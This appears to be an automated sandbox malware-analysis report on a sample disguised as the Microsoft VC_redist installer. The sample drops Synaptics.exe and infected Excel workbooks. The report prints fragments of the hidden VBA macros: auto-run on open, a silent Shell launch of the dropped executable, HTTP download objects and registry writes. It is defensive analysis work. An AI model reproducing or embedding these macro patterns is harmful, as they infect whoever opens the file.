Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: s7GdySVm.xlsm.4.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: GAOBCVIQIJ.xlsm.4.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: s7GdySVm.xlsm.4.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: GAOBCVIQIJ.xlsm.4.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: s7GdySVm.xlsm.4.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: GAOBCVIQIJ.xlsm.4.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\452cad.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F1E.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\vcamp140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\vcomp140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\concrt140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_1.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_2.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_codecvt_ids.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vccorlib140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vcruntime140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\452cb1.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\452cb1.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\452cb2.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{0FA68574-690B-4B00-89AA-B28946231449}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3430.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140chs.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140cht.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140deu.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140enu.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140esn.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140fra.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140ita.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140jpn.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140kor.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140rus.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140u.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfcm140.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfcm140u.dll
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\452cb9.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\452cb9.msi

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\452cb1.msi

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EC0FA	2_2_007EC0FA
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007C6184	2_2_007C6184
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F022D	2_2_007F022D
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007FA3B0	2_2_007FA3B0
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F0662	2_2_007F0662
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007CA7EF	2_2_007CA7EF
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007FA85E	2_2_007FA85E
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EF919	2_2_007EF919
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007D69CC	2_2_007D69CC
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F0A97	2_2_007F0A97
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F2B21	2_2_007F2B21
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007F2D50	2_2_007F2D50
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007FED4C	2_2_007FED4C
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007EFE15	2_2_007EFE15
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E569CC	3_2_00E569CC
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6C0FA	3_2_00E6C0FA
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E46184	3_2_00E46184
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7022D	3_2_00E7022D
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7A3B0	3_2_00E7A3B0
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E70662	3_2_00E70662
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E4A7EF	3_2_00E4A7EF
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7A85E	3_2_00E7A85E
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6F919	3_2_00E6F919
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E70A97	3_2_00E70A97
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E72B21	3_2_00E72B21
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7ED4C	3_2_00E7ED4C
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E72D50	3_2_00E72D50
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E6FE15	3_2_00E6FE15
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD523E7	3_2_6CD523E7
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD61CFF	3_2_6CD61CFF
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD68500	3_2_6CD68500
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD6D628	3_2_6CD6D628
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD61F2E	3_2_6CD61F2E
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_6CD689AE	3_2_6CD689AE
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3C0FA	8_2_00C3C0FA
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C16184	8_2_00C16184
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4022D	8_2_00C4022D
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4A3B0	8_2_00C4A3B0
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C40662	8_2_00C40662
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C1A7EF	8_2_00C1A7EF
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4A85E	8_2_00C4A85E
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C269CC	8_2_00C269CC
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3F919	8_2_00C3F919
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C40A97	8_2_00C40A97
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C42B21	8_2_00C42B21
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4ED4C	8_2_00C4ED4C
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C42D50	8_2_00C42D50
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C3FE15	8_2_00C3FE15
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073C0FA	18_2_0073C0FA
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00716184	18_2_00716184
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074022D	18_2_0074022D
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074A3B0	18_2_0074A3B0
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00740662	18_2_00740662
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0071A7EF	18_2_0071A7EF
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074A85E	18_2_0074A85E
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073F919	18_2_0073F919
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_007269CC	18_2_007269CC
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00740A97	18_2_00740A97
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00742B21	18_2_00742B21
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00742D50	18_2_00742D50
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074ED4C	18_2_0074ED4C
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0073FE15	18_2_0073FE15
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E523E7	20_2_62E523E7
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E689AE	20_2_62E689AE
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E6D628	20_2_62E6D628
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E61F2E	20_2_62E61F2E
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E61CFF	20_2_62E61CFF
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 20_2_62E68500	20_2_62E68500

Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: s7GdySVm.xlsm.4.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: GAOBCVIQIJ.xlsm.4.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: Joe Sandbox View

Dropped File: 452cb5.rbf (copy) 1F9CCCA43EEF25CA44C69648124265944493FC220BCDECDB79AA28C33468B59B

Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 0075061A appears 34 times
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 00711F20 appears 54 times
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 007531C7 appears 84 times
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 62E5D536 appears 38 times
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 62E53D10 appears 82 times
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 007137D3 appears 496 times
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: String function: 0075012F appears 678 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 00E831C7 appears 85 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 00E41F20 appears 54 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 00E437D3 appears 496 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 6CD5D536 appears 38 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 00E8012F appears 678 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 6CD53D10 appears 82 times
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: String function: 00E8061A appears 34 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 0080061A appears 34 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 0080012F appears 678 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 007C1F20 appears 54 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 008031C7 appears 85 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 007C37D3 appears 496 times
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: String function: 00C11F20 appears 54 times
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: String function: 00C531C7 appears 83 times
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: String function: 00C5061A appears 34 times
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: String function: 00C137D3 appears 496 times
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: String function: 00C5012F appears 678 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: file.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXD314.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: mfc140jpn.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140kor.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140fra.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140chs.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140esn.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140enu.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140ita.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140rus.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140deu.dll.16.dr	Static PE information: No import functions for PE file found
Source: mfc140cht.dll.16.dr	Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs file.exe
Source: file.exe, 00000000.00000003.2171491815.0000000001498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs file.exe
Source: file.exe, 00000000.00000003.2171491815.0000000001498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameA-#8 vs file.exe
Source: file.exe, 00000000.00000003.2171491815.0000000001498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameek vs file.exe
Source: file.exe, 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: ._cache_file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: ._cache_file.exe, 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x86.exe vs file.exe
Source: ._cache_file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: ._cache_file.exe, 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x86.exe vs file.exe
Source: ._cache_file.exe, 00000003.00000002.4001726847.000000006CD7C000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamewixstdba.dll\ vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x86.exe vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameb! vs file.exe
Source: ._cache_file.exe.0.dr	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x86.exe vs file.exe
Source: ._cache_file.exe.2.dr	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x86.exe vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal74.spre.troj.expl.evad.winEXE@21/160@4/3

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007FFD20 FormatMessageW,GetLastError,LocalFree,

2_2_007FFD20

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007C44E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,	2_2_007C44E9
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E444E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,	3_2_00E444E9
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C144E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,	8_2_00C144E9
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_007144E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,	18_2_007144E9

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_00802F23 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

2_2_00802F23

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Code function: 3_2_6CD5CEBD FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,

3_2_6CD5CEBD

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 2_2_007E6945 ChangeServiceConfigW,GetLastError,

2_2_007E6945

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Desktop\._cache_file.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X

Source: C:\Users\user\Desktop\._cache_file.exe

File created: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\

Jump to behavior

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCXD314.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: cabinet.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: msi.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: version.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: wininet.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: comres.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: clbcatq.dll	2_2_007C1070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: msasn1.dll	2_2_007C1070
